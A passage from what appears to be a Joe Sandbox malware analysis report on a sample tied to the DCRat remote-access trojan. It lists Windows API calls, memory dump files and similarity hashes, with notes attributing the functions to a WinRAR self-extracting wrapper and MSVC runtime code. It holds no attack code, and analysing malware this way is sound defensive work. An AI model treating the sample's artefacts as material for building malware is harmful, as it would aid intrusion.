                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: a96ac3a5ca86a1705c203cfb65ac07b5972f14fb413ceb442157b89836214a2e
                                                                                              • Instruction ID: 82c67ffc2b71c98f80d238a0869bd82bdab4bb1cf80fe59b792eb8d764fd7806
                                                                                              • Opcode Fuzzy Hash: a96ac3a5ca86a1705c203cfb65ac07b5972f14fb413ceb442157b89836214a2e
                                                                                              • Instruction Fuzzy Hash: 80F08232E006287BDB30A7B59C09F9F7A6CAB4AB40F440021BE00B6180DB60E90286F6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A3ED44
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A3ED80
                                                                                              Note: sfxcmd and sfxpar are the environment variables a WinRAR self-extracting module exports to the commands it launches, so this function, like the temp-path, dialog and riched20.dll functions above, belongs to the self-extracting wrapper rather than to the DCRat payload identified in the overview.
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: fc6dd97abe2e95ba4c83aa682a3c9603e8e4adcf8a546e5adc4cf22aee7ca246
                                                                                              • Instruction ID: 1c0798e4e7a03b7d85f096b9ce5afc4dcdc1d32bdca33b285ae50a0920c5c265
                                                                                              • Opcode Fuzzy Hash: fc6dd97abe2e95ba4c83aa682a3c9603e8e4adcf8a546e5adc4cf22aee7ca246
                                                                                              • Instruction Fuzzy Hash: B6F06572901724BBDB216FD08C06EBA7B68BF19B82F444651FD8597096E774C880D6B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00A44D53,00000000,?,00A840C4,?,?,?,00A44EF6,00000004,InitializeCriticalSectionEx,00A57424,InitializeCriticalSectionEx), ref: 00A44DAF
                                                                                              • GetLastError.KERNEL32(?,00A44D53,00000000,?,00A840C4,?,?,?,00A44EF6,00000004,InitializeCriticalSectionEx,00A57424,InitializeCriticalSectionEx,00000000,?,00A44CAD), ref: 00A44DB9
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00A44DE1
                                                                                              Note: the first LoadLibraryExW uses flag 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32), and the second, with flags 0, is the fallback taken after GetLastError when that flag is unsupported. Together with the "api-ms-" string and the InitializeCriticalSectionEx lookup this is the MSVC runtime's API-set probing, i.e. compiler runtime code rather than sample-specific behaviour.
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: 37e6b3b4fbc90b98e3a4c2f5a5e4f6f43ce39622b25871711dc790a0f1494ad0
                                                                                              • Instruction ID: ba307249ac9625a64a5ccf45b376cf8b3a7eccc2bc46ea20c7764f85d1ed5b7b
                                                                                              • Opcode Fuzzy Hash: 37e6b3b4fbc90b98e3a4c2f5a5e4f6f43ce39622b25871711dc790a0f1494ad0
                                                                                              • Instruction Fuzzy Hash: DAE04F3C684304B7EF105BA1EC06FAD3F58BF44B66F200020FA0DA84E1E761A9919584
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00A2A9F5  (the argument is -10, STD_INPUT_HANDLE; the following ReadFile reads from standard input)
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00A2AA0D
                                                                                              • GetLastError.KERNEL32 ref: 00A2AA3F
                                                                                              • GetLastError.KERNEL32 ref: 00A2AA5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: 5b78485ecc3b8ff70ed397d254fd2b9377d8565538c5f710bf242cb59dab2573
                                                                                              • Instruction ID: d8ae3fd991836940d46f90e770e6f0cecd71b10ae4c08fbd67da6a83ec1c5a55
                                                                                              • Opcode Fuzzy Hash: 5b78485ecc3b8ff70ed397d254fd2b9377d8565538c5f710bf242cb59dab2573
                                                                                              • Instruction Fuzzy Hash: 7B118231900224EBCF209FA8FE0466E37B9BF253A5F204636F91A86190D7748E85DB53
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00A45281,00000000,00000000,?,00A4BE9B,00A45281,00000000,00000000,00000000,?,00A4C098,00000006,FlsSetValue), ref: 00A4BF26
• GetLastError.KERNEL32(?,00A4BE9B,00A45281,00000000,00000000,00000000,?,00A4C098,00000006,FlsSetValue,00A58A00,FlsSetValue,00000000,00000364,?,00A4A5E7), ref: 00A4BF32
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A4BE9B,00A45281,00000000,00000000,00000000,?,00A4C098,00000006,FlsSetValue,00A58A00,FlsSetValue,00000000), ref: 00A4BF40
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: b1230ac3a6e6d66f84352e1b09f83445dbd91573c76c168f816b9afe83101c32
• Instruction ID: 17856733bb4497c6e9b74f631a8260afa229185f3310b6522640d74b77cf5bd2
• Opcode Fuzzy Hash: b1230ac3a6e6d66f84352e1b09f83445dbd91573c76c168f816b9afe83101c32
• Instruction Fuzzy Hash: B301FC3A6253239BC721CBA8AC44A577B98BF95766B250624F91ED3190D720DC06CEF0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(000000F5,?,?,?,?,00A2E79B,00000001,?,?,?,00000000,00A366C2,?,?,?), ref: 00A2B22E
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00A366C2,?,?,?,?,?,00A36184,?), ref: 00A2B275
• WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00A2E79B,00000001,?,?), ref: 00A2B2A1
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: FileWrite$Handle
• String ID:
• API String ID: 4209713984-0
• Opcode ID: 78419e65cd1da5581685576378cea158129594c3eb9a9613cb61863dc8a56b4c
• Instruction ID: 4e42d71b2c5773aee7b478d602ae56ea31cdbeb85cc107b2b001eac43fb92433
• Opcode Fuzzy Hash: 78419e65cd1da5581685576378cea158129594c3eb9a9613cb61863dc8a56b4c
• Instruction Fuzzy Hash: C331DF31218325EFDB04CF18E808BAE77A5FB84715F04452CF9816B2D0CB74A989CBA2
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00A2D68B: _wcslen.LIBCMT ref: 00A2D691
• CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B569
• CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B59C
• GetLastError.KERNEL32(?,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B5B9
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: CreateDirectory$ErrorLast_wcslen
• String ID:
• API String ID: 2260680371-0
• Opcode ID: 2cebba890f8a6e8603f70f356dd030e308ccaae740da4b8ee676d6f0cc0fdeda
• Instruction ID: d77af5c6f833e32a4441d4c9d83c97bd963e31da1932869493bd1fad2913c76e
• Opcode Fuzzy Hash: 2cebba890f8a6e8603f70f356dd030e308ccaae740da4b8ee676d6f0cc0fdeda
• Instruction Fuzzy Hash: 1D01B531224230ABEF21AB787D45BEE3358AF09785F144434FA03EA095DB54DA8286B1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A4CA78
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-3916222277
• Opcode ID: f7636b2e3e5088fa180c7963ed88bfd190a117cda7e4714032c3e1a145b74dd4
• Instruction ID: 399d7817a1cd9251cf1933c910b68a3e3da4d52c13f5a06d40d7ca7e30f6a158
• Opcode Fuzzy Hash: f7636b2e3e5088fa180c7963ed88bfd190a117cda7e4714032c3e1a145b74dd4
• Instruction Fuzzy Hash: 3441287550524C9EDF22CF64CC85BF6BBBAEB85314F1408EDE58E87142D235AE469F20
Uniqueness
Uniqueness Score: -1.00%

APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 00A4C19D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx
• API String ID: 2568140703-3893581201
• Opcode ID: 8e68b3820482ef1e20a3370e0c2bc5964d3262a59ea2a8b625ec0cc3a58127eb
• Instruction ID: b451231c524de2ae9054f40365f9c4080a148361026717242cf9e8b0048c41e4
• Opcode Fuzzy Hash: 8e68b3820482ef1e20a3370e0c2bc5964d3262a59ea2a8b625ec0cc3a58127eb
• Instruction Fuzzy Hash: 73012576501208BBCF029FA4DC02DEE7FA2FF4C761F014515FE0826161CB769972AB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A4B72F), ref: 00A4C115
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx
• API String ID: 2593887523-3084827643
• Opcode ID: 472af13a1a201dd752cce952f3100abeece8790e3a7373a0c9f974d000c70a39
• Instruction ID: d7a12d3590d4dc27593d9813ca915e4bf8398336c9ae4abd8138b91fba7ea9dd
• Opcode Fuzzy Hash: 472af13a1a201dd752cce952f3100abeece8790e3a7373a0c9f974d000c70a39
• Instruction Fuzzy Hash: 59F0BE35A41218BBCF01DF94DC02CAE7FA1FB987A2B014515FE092A260CF719952AB90
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Alloc
• String ID: FlsAlloc
• API String ID: 2773662609-671089009
• Opcode ID: 8a1852e66facb93307b7cb206dd60f55e656b2e69edae2027e3968769056ebdb
• Instruction ID: 0221e6e7cf5c68d32fdff99cc0979ea10699af3c269d0057329429d382958e0a
• Opcode Fuzzy Hash: 8a1852e66facb93307b7cb206dd60f55e656b2e69edae2027e3968769056ebdb
• Instruction Fuzzy Hash: BDE05C30641218BB86009B948C02D7E7F60FB88712F410115FC0463240CF709D4696D9
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3FD6A
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: 3To
• API String ID: 1269201914-245939750
• Opcode ID: 845965362c895a4a8190f7e742a034903ad082f833be8618533e8e7b5f2c93e6
• Instruction ID: 04404d54e4a6a4816c316ecdf8d6ea4e759db4dc0c0e9e3e1eed890477b310d2
• Opcode Fuzzy Hash: 845965362c895a4a8190f7e742a034903ad082f833be8618533e8e7b5f2c93e6
• Instruction Fuzzy Hash: 1BB012A1A78500BD372421203D07F36012CE4C0B16F70893AF841C004094440C481171
Uniqueness
Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A4C97B: GetOEMCP.KERNEL32(00000000,?,?,00A4CC04,?), ref: 00A4C9A6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A4CC49,?,00000000), ref: 00A4CE24
                                                                                              • GetCPInfo.KERNEL32(00000000,00A4CC49,?,?,?,00A4CC49,?,00000000), ref: 00A4CE37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: c1898747250e050a71faa3098c26b4aca8c28ae6abeb77f19c4ff834d9391d30
                                                                                              • Instruction ID: f8da2cf4ed98cafba4456fe3aeab27882dd374fbb9025e63a8296c7705a123f3
                                                                                              • Opcode Fuzzy Hash: c1898747250e050a71faa3098c26b4aca8c28ae6abeb77f19c4ff834d9391d30
                                                                                              • Instruction Fuzzy Hash: DE5124799023059EDB64CF75C8826BBBBF6EFC1320F14446ED09E87252D7399946CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-000018C0,00000000,00000800,?,00A2ACB0,?,?,00000000,?,?,00A29C8B,?), ref: 00A2AE3A
                                                                                              • GetLastError.KERNEL32(?,?,00A29C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 00A2AE49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 87e0540a744da109883145001f690559ff2644ef6e58777263cf899868108daa
                                                                                              • Instruction ID: 9897fb301fa44dc211d98048d7134f54618b8373eafb4693dc7f457f8f1b9458
                                                                                              • Opcode Fuzzy Hash: 87e0540a744da109883145001f690559ff2644ef6e58777263cf899868108daa
                                                                                              • Instruction Fuzzy Hash: C04125352047758BDB24AF6CF9847AA73A4FB78312F100539E84683A51D774DC86CB53
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A4A515: GetLastError.KERNEL32(?,00A63070,00A45982,00A63070,?,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4A519
                                                                                                • Part of subcall function 00A4A515: _free.LIBCMT ref: 00A4A54C
                                                                                                • Part of subcall function 00A4A515: SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A58D
                                                                                                • Part of subcall function 00A4A515: _abort.LIBCMT ref: 00A4A593
                                                                                                • Part of subcall function 00A4CD0E: _abort.LIBCMT ref: 00A4CD40
                                                                                                • Part of subcall function 00A4CD0E: _free.LIBCMT ref: 00A4CD74
                                                                                                • Part of subcall function 00A4C97B: GetOEMCP.KERNEL32(00000000,?,?,00A4CC04,?), ref: 00A4C9A6
                                                                                              • _free.LIBCMT ref: 00A4CC5F
                                                                                              • _free.LIBCMT ref: 00A4CC95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 9684e87d5d6751081bc2c1672a5445d055efd8e138d39492d5b48454d7003e9e
                                                                                              • Instruction ID: 0e846b36013385ffefa9e810d9c7fb09c9f3fd304c1125526b158e6fdf688a18
                                                                                              • Opcode Fuzzy Hash: 9684e87d5d6751081bc2c1672a5445d055efd8e138d39492d5b48454d7003e9e
                                                                                              • Instruction Fuzzy Hash: 8031D439901204EFDB50EFA9D580BADBBF5EF80331F250099E40C9B2A1EB769D41DB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A27ED0,?,?,?,00000000), ref: 00A2B04C
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A2B100
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: bae41592b8b7ef339a7d9443590c39dc74d1c8215734af9dcafbddbedb153a56
                                                                                              • Instruction ID: 38d93141ed47bb9778b78cd73093095cead1c8a5d4b85bde4249eeeb03077b3b
                                                                                              • Opcode Fuzzy Hash: bae41592b8b7ef339a7d9443590c39dc74d1c8215734af9dcafbddbedb153a56
